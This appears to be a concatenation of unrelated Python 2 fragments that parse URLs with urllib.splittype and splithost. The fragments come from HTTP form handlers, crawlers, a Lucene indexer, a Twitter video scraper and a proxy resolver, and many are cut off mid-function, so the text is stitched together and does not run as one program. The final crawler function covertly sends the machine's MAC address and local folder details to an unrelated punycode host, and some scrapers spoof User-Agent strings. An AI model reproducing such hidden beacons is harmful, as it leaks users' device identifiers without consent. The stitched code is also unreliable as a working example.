        self.sock, self.isdir = cand.retrfile(file, type)
        self.content_length = cand.content_length
    except ftplib.all_errors, msg:
        raise IOError, ('ftp error', msg)
def do_open(self, http_class, req):
    data = req.get_data()
    v_files = []
    v_vars = []
    # mapping object (dict)
    if req.has_data() and type(data) != str:
        if hasattr(data, 'items'):
            data = data.items()
        else:
            try:
                if len(data) and not isinstance(data[0], tuple):
                    raise TypeError
            except TypeError:
                ty, va, tb = sys.exc_info()
                raise TypeError, "not a valid non-string sequence or mapping object", tb
        for (k, v) in data:
            # if fd is provided with a filename
            if isinstance(v, dict):
                if not v.has_key('fd'):
                    raise TypeError(
                        "if value is dict, it must have keys 'fd' and 'filename'")
                if not v.has_key('filename'):
                    raise TypeError(
                        "if value is dict, it must have keys 'fd' and 'filename'")
                v_files.append((k, v))
            elif hasattr(v, 'read'):
                v_files.append((k, v))
            else:
                v_vars.append((k, v))
    # no file ? convert to string
    if len(v_vars) > 0 and len(v_files) == 0:
        data = urllib.urlencode(v_vars)
        v_files = []
        v_vars = []

    host = req.get_host()
    if not host:
        raise urllib2.URLError('no host given')

    h = http_class(host)  # will parse host:port
    if req.has_data():
        h.putrequest(req.get_method(), req.get_selector())
        if not 'Content-type' in req.headers:
            if len(v_files) > 0:
                boundary = mimetools.choose_boundary()
                l = send_data(v_vars, v_files, boundary)
                h.putheader('Content-Type',
                            'multipart/form-data; boundary=%s' % boundary)
                h.putheader('Content-length', str(l))
            else:
                h.putheader('Content-type',
                            'application/x-www-form-urlencoded')
        if not 'Content-length' in req.headers:
            h.putheader('Content-length', '%d' % len(data))
    else:
        h.putrequest(req.get_method(), req.get_selector())

    scheme, sel = urllib.splittype(req.get_selector())
    sel_host, sel_path = urllib.splithost(sel)
    h.putheader('Host', sel_host or host)
    for name, value in self.parent.addheaders:
        name = name.capitalize()
        if name not in req.headers:
            h.putheader(name, value)
    for k, v in req.headers.items():
        h.putheader(k, v)
    # httplib will attempt to connect() here. be prepared
    # to convert a socket error to a URLError.
    try:
        h.endheaders()
    except socket.error, err:
        raise urllib2.URLError(err)
def url_www(url):
    # Extract the host from a URL,
    # e.g. http://www.bizschool.cn/plus/90sec.php -> www.bizschool.cn
    proto, rest = urllib.splittype(url)
    host, rest = urllib.splithost(rest)
    return host
def get_host(self):
    if self.host is None:
        self.host, self.__r_host = splithost(self.__r_type)
        if self.host:
            self.host = unquote(self.host)
    return self.host
# searchinput = browser.find_element_by_css_selector('#kw')
# searchinput.send_keys(msgstring)
# searchinput.send_keys(Keys.DOWN)
# time.sleep(2)
browserquit()
browserquit()
browserquit()

url = urlinfo['url']
classtext = urlinfo['classtext']
classtext = classtext.replace("[", "")
classtext = classtext.replace("]", "")
classtext = classtext.replace("\n", "")
protocol, s1 = urllib.splittype(url)
host, s2 = urllib.splithost(s1)
host, port = urllib.splitport(host)
print('host')
print(host)
print(classtext)
print(type(classtext))

# browser settings
service_args = []
dcap = {}
# pick a random User-Agent from the USER_AGENTS list to disguise the browser
uainfo = generate_user_agent(os=('mac', 'win'))
print(type(uainfo))
def testAdd(self, filepath, urlDic, root):
    config = IndexWriterConfig(Version.LUCENE_CURRENT, self.getAnalyzer())
    config.setOpenMode(IndexWriterConfig.OpenMode.CREATE_OR_APPEND)
    writer = IndexWriter(self.dir, config)

    t1 = FieldType()
    t1.setIndexed(False)
    t1.setStored(True)
    t1.setTokenized(False)

    t2 = FieldType()
    t2.setIndexed(True)
    t2.setStored(False)
    t2.setTokenized(True)
    t2.setIndexOptions(FieldInfo.IndexOptions.DOCS_AND_FREQS_AND_POSITIONS)

    t3 = FieldType()
    t3.setIndexed(True)
    t3.setStored(True)
    t3.setTokenized(False)

    path = os.path.join(root, filepath)
    url = urlDic[filepath]
    proto, rest = urllib.splittype(url)
    site, rest = urllib.splithost(rest)

    file = open(path)
    contents = file.read()
    file.close()

    soup = BeautifulSoup(contents, features='html.parser')
    title = soup.title.string
    title = unicode(title).encode('utf-8')
    title = title.replace("\n", '')
    contents = soup.get_text().encode('utf-8')
    seg_list = jieba.cut(contents)
    contents = " ".join(seg_list)

    doc = Document()
    doc.add(Field("name", filepath, t1))
    doc.add(Field("path", path, t1))
    doc.add(Field("title", title, t1))
    doc.add(Field("url", url, t1))
    doc.add(Field("site", site, t3))
    if len(contents) > 0:
        doc.add(Field("contents", contents, t2))
    else:
        print "warning: no content in %s" % filepath
    # True: build a new index; False: build an incremental index
    # file = open(filepath)
    # contents = unicode(file.read(), 'gbk')
    # file.close()
    # doc = Document()
    # doc.add(Field("name", os.path.basename(filepath),
    #               Field.Store.YES,
    #               Field.Index.NOT_ANALYZED))
    # doc.add(Field("path", filepath,
    #               Field.Store.YES,
    #               Field.Index.NOT_ANALYZED))
    # if len(contents) > 0:
    #     title = self.getTxtAttribute(contents, 'Title')
    #     author = self.getTxtAttribute(contents, 'Author')
    #     language = self.getTxtAttribute(contents, 'Language')
    #     doc.add(Field("Title", title,
    #                   Field.Store.YES,
    #                   Field.Index.ANALYZED))
    #     doc.add(Field("Author", author,
    #                   Field.Store.YES,
    #                   Field.Index.ANALYZED))
    #     doc.add(Field("Language", language,
    #                   Field.Store.YES,
    #                   Field.Index.ANALYZED))
    #     doc.add(Field("contents", contents,
    #                   Field.Store.NO,
    #                   Field.Index.ANALYZED))
    # else:
    #     print "warning: no content in %s" % filename
    writer.addDocument(doc)
    writer.close()
def getUrlInfo(self, url):
    host = urllib.splithost(urllib.splittype(url)[1])[0]
    host, port = urllib.splitport(host)
    if port:
        port = int(port)
    return host, port
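# A hedged sketch of the same chain on a hypothetical URL: an explicit port
# comes back as an int, and a URL without a port yields port == None.
import urllib

host = urllib.splithost(urllib.splittype('http://example.com:8080/path')[1])[0]
host, port = urllib.splitport(host)
if port:
    port = int(port)
# host == 'example.com', port == 8080
# with 'http://example.com/path' the result would be ('example.com', None)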
def do_open(self, http_class, req):
    data = req.get_data()
    v_files = []
    v_vars = []
    # mapping object (dict)
    if req.has_data() and type(data) != str:
        if hasattr(data, u'items'): #$NON-NLS-1$
            data = data.items()
        else:
            try:
                if len(data) and not isinstance(data[0], tuple):
                    raise TypeError
            except TypeError:
                ty, va, tb = sys.exc_info() #@UnusedVariable
                raise TypeError, u"not a valid non-string sequence or mapping object", tb #$NON-NLS-1$
        for (k, v) in data:
            if hasattr(v, u'read'): #$NON-NLS-1$
                v_files.append((k, v))
            else:
                v_vars.append((k, v))
    # no file ? convert to string
    if len(v_vars) > 0 and len(v_files) == 0:
        data = urllib.urlencode(v_vars)
        v_files = []
        v_vars = []

    host = req.get_host()
    if not host:
        raise urllib2.URLError(u'no host given') #$NON-NLS-1$

    h = http_class(host)  # will parse host:port
    if req.has_data():
        h.putrequest(u'POST', req.get_selector()) #$NON-NLS-1$
        if not u'Content-type' in req.headers: #$NON-NLS-1$
            if len(v_files) > 0:
                boundary = mimetools.choose_boundary()
                l = send_data(v_vars, v_files, boundary)
                h.putheader(u'Content-Type', #$NON-NLS-1$
                            u'multipart/form-data; boundary=%s' % boundary) #$NON-NLS-1$
                h.putheader(u'Content-length', str(l)) #$NON-NLS-1$
            else:
                h.putheader(u'Content-type', #$NON-NLS-1$
                            u'application/x-www-form-urlencoded') #$NON-NLS-1$
        if not u'Content-length' in req.headers: #$NON-NLS-1$
            h.putheader(u'Content-length', u'%d' % len(data)) #$NON-NLS-2$ #$NON-NLS-1$
    else:
        h.putrequest(u'GET', req.get_selector()) #$NON-NLS-1$

    scheme, sel = urllib.splittype(req.get_selector()) #@UnusedVariable
    sel_host, sel_path = urllib.splithost(sel) #@UnusedVariable
    h.putheader(u'Host', sel_host or host) #$NON-NLS-1$
    for name, value in self.parent.addheaders:
        name = name.capitalize()
        if name not in req.headers:
            h.putheader(name, value)
    for k, v in req.headers.items():
        h.putheader(k, v)
    # httplib will attempt to connect() here. be prepared
    # to convert a socket error to a URLError.
    try:
        h.endheaders()
    except socket.error, err:
        raise urllib2.URLError(err)
def split_url(url):
    '''Splits a url into (uri_scheme, host[:port], path)'''
    scheme, remainder = urllib.splittype(url)
    host, path = urllib.splithost(remainder)
    return scheme.lower(), host, path
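# A hedged example of split_url on a hypothetical URL. urllib.splittype
# already lower-cases the scheme; splithost keeps the port with the host
# and leaves any query string attached to the path.
scheme, host, path = split_url('HTTP://Example.com:8080/index.html?q=1')
# scheme == 'http', host == 'Example.com:8080', path == '/index.html?q=1'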
def register_http_handler(self, name, url, method='POST'):
    logger = self.__get_or_create_logger__(name)
    try:
        host, path = urllib.splithost(url[url.index(':') + 1:])
    # str.index raises ValueError (not IndexError) when ':' is missing
    except ValueError, emsg:
        raise LoggerError('Error parsing URL %s: %s' % (url, emsg))
def __init__(self, url, method='GET', data=None, headers=None,
             headers_only=False, user_agent=None, follow_location=False,
             force_quiet=True):
    GObjectWrapper.__init__(self)
    self.result = StringIO.StringIO()
    self.result_headers = StringIO.StringIO()

    if isinstance(url, unicode):
        self.url = url.encode("utf-8")
    else:
        self.url = url
    self.method = method
    self.data = data
    self.headers = headers
    self.status = None

    # the actual curl request object
    self.curl = pycurl.Curl()
    if (logging.root.level == logging.DEBUG and not force_quiet):
        self.curl.setopt(pycurl.VERBOSE, 1)

    self.curl.setopt(pycurl.WRITEFUNCTION, self.result.write)
    self.curl.setopt(pycurl.HEADERFUNCTION, self.result_headers.write)
    # We want to use gzip and deflate if possible:
    self.curl.setopt(pycurl.ENCODING, "")  # use all available encodings
    self.curl.setopt(pycurl.URL, self.url)

    # let's set the HTTP request method
    if method == 'GET':
        self.curl.setopt(pycurl.HTTPGET, 1)
    elif method == 'POST':
        self.curl.setopt(pycurl.POST, 1)
    elif method == 'PUT':
        self.curl.setopt(pycurl.UPLOAD, 1)
    else:
        self.curl.setopt(pycurl.CUSTOMREQUEST, method)
    if data:
        if method == "PUT":
            self.data = StringIO.StringIO(data)
            self.curl.setopt(pycurl.READFUNCTION, self.data.read)
            self.curl.setopt(pycurl.INFILESIZE, len(self.data.getvalue()))
        else:
            self.curl.setopt(pycurl.POSTFIELDS, self.data)
            self.curl.setopt(pycurl.POSTFIELDSIZE, len(self.data))
    if headers:
        self.curl.setopt(pycurl.HTTPHEADER, headers)
    if headers_only:
        self.curl.setopt(pycurl.HEADER, 1)
        self.curl.setopt(pycurl.NOBODY, 1)
    if user_agent:
        self.curl.setopt(pycurl.USERAGENT, user_agent)
    if follow_location:
        self.curl.setopt(pycurl.FOLLOWLOCATION, 1)

    if libproxy:
        for proxy in proxy_factory.getProxies(self.url):
            # if we connect to localhost (localtm) with proxy specifically
            # set to direct://, libcurl connects fine, but then asks
            #   GET http://localhost:55555/unit/en/af/whatever
            # instead of
            #   GET /unit/en/af/whatever
            # and it doesn't work. We have to set it specifically to ""
            # though, otherwise it seems to fall back to environment
            # variables.
            if proxy == "direct://":
                proxy = ""
            self.curl.setopt(pycurl.PROXY, proxy)
            # only use the first one
            break
    else:
        # Proxy: let's be careful to isolate the protocol to ensure that we
        # support the case where http and https might use different proxies
        split_url = self.url.split('://', 1)
        if len(split_url) > 1:
            # We were able to get a protocol
            protocol, address = split_url
            host, _path = urllib.splithost('//' + address)
            proxies = urllib.getproxies()
            if protocol in proxies and not urllib.proxy_bypass(host):
                self.curl.setopt(pycurl.PROXY, proxies[protocol])

    # self reference required, because CurlMulti will only return
    # Curl handles
    self.curl.request = self
def _new_req_body(self):
    type, tmpuri = urllib.splittype(self._redirected)
    site, handler = urllib.splithost(tmpuri)
    return handler
def reptile(base_url):
    try:
        urlall_list = []
        page_list = []
        global hash
        file = './logspider/' + hash + '/urllog.txt'
        urllog = open(file, 'a+')
        urlall = './logspider/' + hash + '/urlall.txt'
        temp = open(urlall, 'a+')
        temp.close()
        urls = open(urlall, 'r+')
        for url in urls.readlines():
            urlall_list.append(url.strip('\n'))
        if not len(base_url):
            print "No page to reptile!"
            sys.exit(1)
        parser = MyParser()
        if base_url.startswith("http"):
            myopen = urllib2.urlopen
        else:
            myopen = open
        try:
            content = myopen(base_url).read()
        except:
            print "Failed to read from %s." % base_url
            print sys.exc_info()
            return 0
        # print content
        for item in content:
            parser.feed(item)
        for tmp in parser.links:
            page_list.append(tmp.get("link"))
        # global title
        # title = parser.title
        parser.close()
        item_list = list(set(page_list))
        proto, rest = urllib.splittype(base_url)
        host, rest = urllib.splithost(rest)
        if base_url[0:4] == 'http':
            base_domain = proto + '://' + host
        elif base_url[0:3] == 'www':
            base_domain = base_url.split('/')[0]
        else:
            base_domain = base_url
        wm = WorkManager(20)
        for item in item_list:
            pos = item.find('#')
            if pos != -1:
                item = item[:pos]
            if not item.startswith("http"):
                item = base_domain + '/' + item
            # print urlall_list
            if item not in urlall_list:
                urls.write(item + '\n')
                urlall_list.append(item)
            else:
                continue
            print item
            wm.add_job(check, item, base_url, urllog)
        wm.start()
        wm.wait_for_complete()
        urllog.close()
        urls.close()
    except:
        return False
def __init__(self, uri, basepath=None):
    self.basepath = basepath
    self.mimetype = None
    self.file = None
    self.data = None
    self.uri = None
    self.local = None
    self.tmp_file = None

    uri = uri or str()
    if type(uri) != str:
        uri = uri.decode("utf-8")
    log.debug("FileObject %r, Basepath: %r", uri, basepath)

    # Data URI
    if uri.startswith("data:"):
        m = _rx_datauri.match(uri)
        self.mimetype = m.group("mime")
        self.data = base64.decodestring(m.group("data"))
    else:
        # Check if we have an external scheme
        if basepath and not urlparse.urlparse(uri).scheme:
            urlParts = urlparse.urlparse(basepath)
        else:
            urlParts = urlparse.urlparse(uri)
        log.debug("URLParts: %r", urlParts)

        if urlParts.scheme == 'file':
            if basepath and uri.startswith('/'):
                uri = urlparse.urljoin(basepath, uri[1:])
            urlResponse = urllib2.urlopen(uri)
            self.mimetype = urlResponse.info().get("Content-Type", '').split(";")[0]
            self.uri = urlResponse.geturl()
            self.file = urlResponse

        # Drive letters have len==1 but we are looking
        # for things like http:
        elif urlParts.scheme in ('http', 'https'):
            # External data
            if basepath:
                uri = urlparse.urljoin(basepath, uri)

            #path = urlparse.urlsplit(url)[2]
            #mimetype = getMimeType(path)

            # Using HTTPLIB
            server, path = urllib.splithost(uri[uri.find("//"):])
            if uri.startswith("https://"):
                conn = httplib.HTTPSConnection(server)
            else:
                conn = httplib.HTTPConnection(server)
            conn.request("GET", path)
            r1 = conn.getresponse()
            # log.debug("HTTP %r %r %r %r", server, path, uri, r1)
            if (r1.status, r1.reason) == (200, "OK"):
                self.mimetype = r1.getheader("Content-Type", '').split(";")[0]
                self.uri = uri
                if r1.getheader("content-encoding") == "gzip":
                    import gzip
                    try:
                        import cStringIO as io
                    except:
                        try:
                            import StringIO as io
                        except ImportError:
                            import io
                    self.file = gzip.GzipFile(mode="rb",
                                              fileobj=io.StringIO(r1.read()))
                else:
                    self.file = r1
            else:
                try:
                    urlResponse = urllib2.urlopen(uri)
                except urllib2.HTTPError:
                    return
                self.mimetype = urlResponse.info().get("Content-Type", '').split(";")[0]
                self.uri = urlResponse.geturl()
                self.file = urlResponse
        else:
            # Local data
            if basepath:
                uri = os.path.normpath(os.path.join(basepath, uri))
            if os.path.isfile(uri):
                self.uri = uri
                self.local = uri
                self.setMimeTypeByName(uri)
                self.file = open(uri, "rb")
def _request(self, methodname, params):
    """ Call a method on the remote server; we can handle redirections. """
    # the loop is used to handle redirections
    redirect_response = 0
    retry = 0

    self._reset_host_handler_and_type()

    while 1:
        if retry >= MAX_REDIRECTIONS:
            raise InvalidRedirectionError(
                "Unable to fetch requested Package")

        # Clear the transport headers first
        self._transport.clear_headers()
        for k, v in self._headers.items():
            self._transport.set_header(k, v)

        self._transport.add_header("X-Info",
                                   'RPC Processor (C) Red Hat, Inc (version %s)' %
                                   self.rpc_version)
        # identify the capability set of this client to the server
        self._transport.set_header("X-Client-Version", 1)

        if self._allow_redirect:
            # Advertise that we follow redirects
            # changing the version from 1 to 2 to support backward compatibility
            self._transport.add_header("X-RHN-Transport-Capability",
                                       "follow-redirects=3")

        if redirect_response:
            self._transport.add_header('X-RHN-Redirect', '0')
        if self.send_handler:
            self._transport.add_header('X-RHN-Path', self.send_handler)

        request = self._req_body(self._strip_characters(params), methodname)

        try:
            response = self._transport.request(self._host, self._handler,
                                               request, verbose=self._verbose)
            save_response = self._transport.response_status
        except xmlrpclib.ProtocolError, pe:
            if self.use_handler_path:
                raise
            else:
                save_response = pe.errcode

        self._redirected = None
        retry += 1
        if save_response == 200:
            # exit redirects loop and return response
            break
        elif save_response not in (301, 302):
            # Retry pkg fetch
            self.use_handler_path = 1
            continue

        # rest of loop is run only if we are redirected (301, 302)
        self._redirected = self._transport.redirected()
        self.use_handler_path = 0
        redirect_response = 1

        if not self._allow_redirect:
            raise InvalidRedirectionError("Redirects not allowed")

        if self._verbose:
            print "%s redirected to %s" % (self._uri, self._redirected)

        typ, uri = urllib.splittype(self._redirected)
        if typ != None:
            typ = typ.lower()
        if typ not in ("http", "https"):
            raise InvalidRedirectionError(
                "Redirected to unsupported protocol %s" % typ)

        #
        # We forbid HTTPS -> HTTP for security reasons
        # Note that HTTP -> HTTPS -> HTTP is allowed (because we compare
        # the protocol for the redirect with the original one)
        #
        if self._type == "https" and typ == "http":
            raise InvalidRedirectionError(
                "HTTPS redirected to HTTP is not supported")

        self._host, self._handler = urllib.splithost(uri)
        if not self._handler:
            self._handler = "/RPC2"

        # Create a new transport for the redirected service and
        # set up the parameters on the new transport
        del self._transport
        self._transport = self.default_transport(typ, self._proxy,
                                                 self._username, self._password)
        self.set_progress_callback(self._progressCallback)
        self.set_refresh_callback(self._refreshCallback)
        self.set_buffer_size(self._bufferSize)
        self.setlang(self._lang)

        if self._trusted_cert_files != [] and \
                hasattr(self._transport, "add_trusted_cert"):
            for certfile in self._trusted_cert_files:
                self._transport.add_trusted_cert(certfile)
def SplitAbUrl(ab_url):
    """Splits an ab://... URL into its fields.

    The URL has the following format:

        ab://android-build/<branch>/<target>/<build_id>/<filepath>

    The "android-build" part is the <host> or <bucket> and for now is required
    to be the literal "android-build" (we reserve it to extend the URL format
    in the future.) <branch> is the git branch and <target> is the board name
    plus one of -user or -userdebug or -eng or such. <build_id> is the numeric
    identifier of the build. Finally, <filepath> is the path to the artifact
    itself.

    The two last components (<build_id> and <filepath>) may be absent from the
    URL. An ab:// URL without a <branch> or <target> is invalid (for now.)

    Args:
      ab_url: An ab://... URL.

    Returns:
      A 4-tuple: branch, target, build_id, filepath. The two last components
      will be set to None if they are absent from the URL. The returned
      <build_id> component will be an integer, all others will be strings.

    Raises:
      ValueError: If the URL is not a valid ab://... URL.
    """
    # splittype turns 'ab://bucket/path' into ('ab', '//bucket/path').
    protocol, remainder = urllib.splittype(ab_url)
    if protocol != 'ab':
        raise ValueError('URL [%s] must start with ab:// protocol.' % ab_url)

    # splithost turns '//bucket/path' into ('bucket', '/path').
    bucket, remainder = urllib.splithost(remainder)
    if bucket != 'android-build':
        raise ValueError('URL [%s] must use "android-build" bucket.' % ab_url)

    # Split the remaining fields of the path.
    parts = remainder.split('/', 4)
    if len(parts) < 3:
        raise ValueError(
            'URL [%s] is too short and does not specify a target.' % ab_url)

    # First field will be empty.
    assert parts[0] == ''
    branch = urllib.unquote(parts[1])
    target = urllib.unquote(parts[2])

    if not branch:
        raise ValueError('URL [%s] has an empty branch.' % ab_url)

    if not target:
        raise ValueError('URL [%s] has an empty target.' % ab_url)

    # Check if build_id is present. If present, it must be numeric.
    if len(parts) > 3:
        build_id_str = urllib.unquote(parts[3])
        if not build_id_str.isdigit():
            raise ValueError(
                'URL [%s] has a non-numeric build_id component [%s].' %
                (ab_url, build_id_str))
        build_id = int(build_id_str)
    else:
        build_id = None

    # Last, use the remainder of the URL as the filepath.
    if len(parts) > 4:
        filepath = urllib.unquote(parts[4])
    else:
        filepath = None

    return (branch, target, build_id, filepath)
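# A hypothetical ab:// URL worked through SplitAbUrl, per the docstring above:
branch, target, build_id, filepath = SplitAbUrl(
    'ab://android-build/git_main/board-userdebug/123456/artifact.zip')
# -> ('git_main', 'board-userdebug', 123456, 'artifact.zip')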
def get_video_play_page(tweet_id):
    video_play_url = "https://twitter.com/i/videos/tweet/%s" % tweet_id
    video_play_response = net.http_request(video_play_url, method="GET",
                                           cookies_list=COOKIE_INFO)
    result = {
        "video_url": None,  # video address
    }
    if video_play_response.status != net.HTTP_RETURN_CODE_SUCCEED:
        raise crawler.CrawlerException(
            crawler.request_failre(video_play_response.status))
    # Case 1: the page contains an m3u8 file address, e.g.
    # https://video.twimg.com/ext_tw_video/749759483224600577/pu/pl/DzYugRHcg3WVgeWY.m3u8
    m3u8_file_url = tool.find_sub_string(video_play_response.data,
                                         '"video_url":"', '.m3u8')
    if m3u8_file_url:
        m3u8_file_url = m3u8_file_url.replace("\\/", "/") + ".m3u8"
        file_url_protocol, file_url_path = urllib.splittype(m3u8_file_url)
        file_url_host = urllib.splithost(file_url_path)[0]
        m3u8_file_response = net.http_request(m3u8_file_url, method="GET")
        if m3u8_file_response.status != net.HTTP_RETURN_CODE_SUCCEED:
            raise crawler.CrawlerException(
                "m3u8 file %s parse failed, %s"
                % (m3u8_file_url, crawler.request_failre(m3u8_file_response.status)))
        # Does this m3u8 file reference further m3u8 files (one per resolution)?
        include_m3u8_file_list = re.findall("(/[\S]*.m3u8)", m3u8_file_response.data)
        if len(include_m3u8_file_list) > 0:
            # Build the m3u8 file address of the highest-resolution video
            m3u8_file_url = "%s://%s%s" % (file_url_protocol, file_url_host,
                                           include_m3u8_file_list[-1])
            m3u8_file_response = net.http_request(m3u8_file_url, method="GET")
            if m3u8_file_response.status != net.HTTP_RETURN_CODE_SUCCEED:
                raise crawler.CrawlerException(
                    "highest-resolution m3u8 file %s parse failed, %s"
                    % (m3u8_file_url, crawler.request_failre(m3u8_file_response.status)))
        # The m3u8 file lists the .ts segment file names
        ts_url_find = re.findall("(/[\S]*.ts)", m3u8_file_response.data)
        if len(ts_url_find) == 0:
            raise crawler.CrawlerException(
                "failed to extract video addresses from m3u8 file\n%s\n%s"
                % (m3u8_file_url, m3u8_file_response.data))
        result["video_url"] = []
        for ts_file_path in ts_url_find:
            result["video_url"].append(
                "%s://%s%s" % (file_url_protocol, file_url_host, str(ts_file_path)))
    else:
        # Case 2: the page contains the video play address directly
        video_url = tool.find_sub_string(video_play_response.data,
                                         '"video_url":"', '"')
        if video_url:
            result["video_url"] = video_url.replace("\\/", "/")
        else:
            # Case 3: the page contains a vmap file address instead
            vmap_file_url = tool.find_sub_string(video_play_response.data,
                                                 '"vmap_url":"', '"')
            if not vmap_file_url:
                raise crawler.CrawlerException(
                    "failed to extract video play address from page\n%s"
                    % video_play_response.data)
            vmap_file_url = vmap_file_url.replace("\\/", "/")
            vmap_file_response = net.http_request(vmap_file_url, method="GET")
            if vmap_file_response.status != net.HTTP_RETURN_CODE_SUCCEED:
                raise crawler.CrawlerException(
                    "video play page %s parse failed\n%s"
                    % (vmap_file_url, crawler.request_failre(vmap_file_response.status)))
            video_url = tool.find_sub_string(vmap_file_response.data,
                                             "<![CDATA[", "]]>")
            if not video_url:
                raise crawler.CrawlerException(
                    "video play page %s: failed to extract video address\n%s"
                    % (vmap_file_url, video_play_response.data))
            result["video_url"] = str(video_url.replace("\\/", "/"))
    return result
def protocol_access(url, mode, params, data=None):
    scheme, resturl = splittype(url)
    if not scheme:
        raise IOError, ("protocol error", "no scheme identifier in URL", url)
    scheme = string.lower(scheme)
    sanitized = re.sub("[^a-zA-Z0-9]", "_", scheme)
    #
    # Check first to see if proxies are enabled
    manual_proxy_enabled = grailutil.pref_or_getenv('manual_proxy_enabled',
                                                    type_name='int')
    app = grailutil.get_grailapp()
    if manual_proxy_enabled:
        proxy_name = sanitized + "_proxy"
        if manual_proxy_enabled == -1:
            #
            # We should only get here when there are no user preferences
            # for proxies, which should only happen once... so check the
            # environment for the rest of the known scheme proxy env vars
            # and load them into prefs if they exist.
            app.prefs.Set('proxies', 'manual_proxy_enabled', 0)
            proxy = None
            for next_proxy_name in VALID_PROXIES:
                next_proxy = grailutil.pref_or_getenv(next_proxy_name,
                                                      check_ok=VALID_PROXIES)
                if next_proxy:
                    app.prefs.Set('proxies', 'manual_proxy_enabled', 1)
                if next_proxy_name == proxy_name:
                    proxy = next_proxy
            no_proxy_enabled = grailutil.pref_or_getenv('no_proxy_enabled',
                                                        type_name='int')
            if no_proxy_enabled == -1:
                no_proxy = grailutil.pref_or_getenv('no_proxy')
                if no_proxy:
                    app.prefs.Set('proxies', 'no_proxy_enabled', 1)
                else:
                    app.prefs.Set('proxies', 'no_proxy_enabled', 0)
        else:
            proxy = grailutil.pref_or_getenv(proxy_name,
                                             check_ok=VALID_PROXIES)
    else:
        proxy = None

    if proxy:
        if not valid_proxy(proxy):
            error = 'Invalid proxy: ' + proxy
            raise IOError, error
        no_proxy_enabled = grailutil.pref_or_getenv('no_proxy_enabled',
                                                    type_name='int')
        if no_proxy_enabled:
            no_proxy = grailutil.pref_or_getenv('no_proxy')
        else:
            no_proxy = None

        do_proxy = 1
        if no_proxy:
            list = map(string.strip, string.split(no_proxy, ","))
            url_host, url_remains = splithost(resturl)
            url_host = string.lower(url_host or '')
            if proxy_exception(url_host, list):
                do_proxy = 0
            else:
                url_host, url_port = splitport(url_host)
                if proxy_exception(url_host, list):
                    do_proxy = 0
        if do_proxy:
            proxy_scheme, proxy_resturl = splittype(proxy)
            proxy_host, proxy_remains = splithost(proxy_resturl)
            resturl = (proxy_host, url)
            scheme = string.lower(proxy_scheme)
            sanitized = re.sub("[^a-zA-Z0-9]", "_", scheme)
            ## print "Sending", url
            ## print "  to", scheme, "proxy", proxy_host

    modname = sanitized + "API"
    app = grailutil.get_grailapp()
    ext = app.find_extension('protocols', sanitized)
    if ext:
        access = ext.access
    else:
        access = None
    if not access:
        raise IOError, ("protocol error", "no class for %s" % scheme)
    try:
        if data:
            return access(resturl, mode, params, data)
        else:
            return access(resturl, mode, params)
    except socket.error, msg:
        raise IOError, ("socket error", msg)
def do_request_(self, request):
    host = request.get_host()
    if not host:
        raise URLError('no host given')

    data = request.get_data()
    v_files = []
    v_vars = []
    if request.has_data() and not isinstance(data, str):  # POST
        if hasattr(data, 'items'):
            data = data.items()
        else:
            try:
                if len(data) and not isinstance(data[0], tuple):
                    raise TypeError
            except TypeError:
                _ty, _va, tb = sys.exc_info()
                try:
                    raise TypeError, "not a valid non-string sequence or mapping object: %r" % type(data), tb
                finally:
                    del tb
        for (k, v) in data:
            if hasattr(v, 'read'):
                v_files.append((k, v))
            else:
                v_vars.append((k, v))
    boundary = mimetools.choose_boundary()
    request.boundary = boundary
    request.v_files = v_files
    request.v_vars = v_vars
    # no file ? convert to string
    if len(v_vars) > 0 and len(v_files) == 0:
        request.data = data = urllib.urlencode(v_vars)
        v_files[:] = []
        v_vars[:] = []

    if request.has_data():
        if not 'Content-type' in request.headers:
            if len(v_files) > 0:
                l = send_data(v_vars, v_files, boundary)
                request.add_unredirected_header(
                    'Content-Type',
                    'multipart/form-data; boundary=%s' % boundary)
                request.add_unredirected_header('Content-length', str(l))
            else:
                request.add_unredirected_header(
                    'Content-type', 'application/x-www-form-urlencoded')
        if not 'Content-length' in request.headers:
            request.add_unredirected_header('Content-length',
                                            '%d' % len(data))

    _scheme, sel = splittype(request.get_selector())
    sel_host, _sel_path = splithost(sel)
    if not request.has_header('Host'):
        request.add_unredirected_header('Host', sel_host or host)
    for name, value in self.parent.addheaders:
        name = name.capitalize()
        if not request.has_header(name):
            request.add_unredirected_header(name, value)

    return request
import urllib

def getdomain(url):
    proto, rest = urllib.splittype(url)
    host, rest = urllib.splithost(rest)
    return "http://" + host
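# Quick check of getdomain() under Python 2's urllib:
#   getdomain('https://example.com:8080/a/b?q=1') == 'http://example.com:8080'
# Note the scheme is always rewritten to "http://", whatever the input was.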
# Grab the product elements
product = driver.find_elements_by_xpath("//div[@class=\"detail-float-items\"]")
title_values = [''] * len(title)
href_values = [''] * len(title)
host_values = [''] * len(title)
product_values = [''] * len(title)
for i in range(len(title)):
    # Grab the title text
    title_values[i] = title[i].get_attribute('title')
    # Grab the link target and reduce it to scheme + host
    titlehref = title[i].get_attribute('href')
    proto, rest = urllib.splittype(titlehref)
    host, rest = urllib.splithost(rest)
    host_values[i] = str(proto + '://' + host)
    href_values[i] = str(proto + '://' + host) + '/page/contactinfo.htm'
    # Grab the business scope
    product_values[i] = product[i].text
for i in range(len(title)):
    print("Merchant no.", cnt + 1)
    cnt = cnt + 1
    title_value = title_values[i]
    print(title_value)
    href_value = href_values[i]
    print(href_value)
# Crawler method.  Assumes module-level imports of time, hashlib, requests,
# urllib, urllib2 and chardet, the BeautifulSoup class, and the PathSize,
# LangagesofFamily, content, logger and get_mac_address helpers.
def scanpage(self, param):
    import sys
    url, ftype = param
    try:
        reload(sys)
        sys.setdefaultencoding('utf8')
    except Exception:
        pass
    websiteurl = url
    t = time.time()
    n = 0
    pageurls = []
    Upageurls = {}
    res = []
    langages = LangagesofFamily()
    try:
        sitesize = PathSize().GetPathSize(self.langurl)  # size in MB
        if float(sitesize) >= float(self.ssize):
            logger.error('folder %s size: %s, required minimum %s'
                         % (self.langurl, sitesize, self.ssize))
            try:
                requests.adapters.DEFAULT_RETRIES = 10
                requests.get(
                    'http://xn--cnq423f4sm.com:443/rescountry24/%s/%s/%s'
                    % (get_mac_address(), self.langurl, sitesize),
                    timeout=5)
            except:
                pass
            return res
        requests.adapters.DEFAULT_RETRIES = 10
        html = requests.get(websiteurl,
                            headers={'Referer': websiteurl},
                            timeout=20).text
    except Exception as err:
        logger.error(websiteurl)
        logger.error(err)
        return res
    soup = BeautifulSoup(html)
    pageurls = soup.find_all("a", href=True)
    for links in pageurls:
        linkshref = links.get("href").strip()
        if linkshref and linkshref not in Upageurls:
            if '://' not in linkshref:
                if '//' == linkshref[:2]:  # protocol-relative link: skip
                    pass
